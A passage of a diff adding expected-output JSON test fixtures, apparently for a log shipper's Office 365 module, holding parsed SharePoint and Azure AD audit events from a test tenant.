Owners", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:55.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "e85ec350-af23-47a7-5b33-08d8c9b586be", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 27229, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:55", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "e85ec350-af23-47a7-5b33-08d8c9b586be", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "SHAREPOINT\\system", + "o365.audit.TargetUserOrGroupType": "Member", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:08:14.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "ListUpdated", + "event.category": "web", + "event.code": "SharePointListOperation", + "event.dataset": "o365.audit", + "event.id": "32474de1-fca7-4d81-4f97-08d8c9b591a4", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 28021, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d", + "o365.audit.CreationTime": "2021-02-05T09:08:14", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "32474de1-fca7-4d81-4f97-08d8c9b591a4", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 0, + "o365.audit.ItemType": "List", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.Operation": "ListUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 36, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:08:14.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "ListCreated", + "event.category": "web", + "event.code": "SharePointListOperation", + "event.dataset": "o365.audit", + "event.id": "20b7fc96-6e31-437a-50fa-08d8c9b59185", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 29095, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d", + "o365.audit.CreationTime": "2021-02-05T09:08:14", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "20b7fc96-6e31-437a-50fa-08d8c9b59185", + "o365.audit.ItemType": "List", + "o365.audit.ListBaseTemplateType": "DocumentLibrary", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96CDFC22-2B86-49EA-B4E9-F11888B1665D", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/SiteAssets", + "o365.audit.Operation": "ListCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 36, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "3813eef0-90e1-4758-54d8-08d8c9b5938e", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 30032, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "3813eef0-90e1-4758-54d8-08d8c9b5938e", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d/03e45e84-1992-4d42-9116-26f756012634", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 31123, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d/0c5e0085-eb30-494b-9cdd-ece1d3c649a2", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "f4579e76-fb4b-4434-904e-08d8c9b59389", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 32214, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "f4579e76-fb4b-4434-904e-08d8c9b59389", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d/39360f11-34cf-4356-9945-25c44e68dade", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "b401dd51-f4a2-477f-cc42-08d8c9b59384", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 33305, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "b401dd51-f4a2-477f-cc42-08d8c9b59384", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/03e45e84-1992-4d42-9116-26f756012634", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "073f437c-2e04-441a-05ad-08d8c9b59380", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 34396, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "073f437c-2e04-441a-05ad-08d8c9b59380", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/0c5e0085-eb30-494b-9cdd-ece1d3c649a2", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "8f586afb-1438-475e-a4d5-08d8c9b5937d", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 35487, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "8f586afb-1438-475e-a4d5-08d8c9b5937d", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/39360f11-34cf-4356-9945-25c44e68dade", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:06:07.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoggedIn", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "550ed0e2-27da-4cbc-9fb8-46add4018800", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 36578, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:06:07", + "o365.audit.ErrorNumber": "0", + "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Redirect", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.Id": "550ed0e2-27da-4cbc-9fb8-46add4018800", + "o365.audit.InterSystemsId": "df4c6d6c-4551-4f2d-8766-03700dfccb47", + "o365.audit.IntraSystemId": "550ed0e2-27da-4cbc-9fb8-46add4018800", + "o365.audit.ObjectId": "Unknown", + "o365.audit.Operation": "UserLoggedIn", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "Unknown", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + 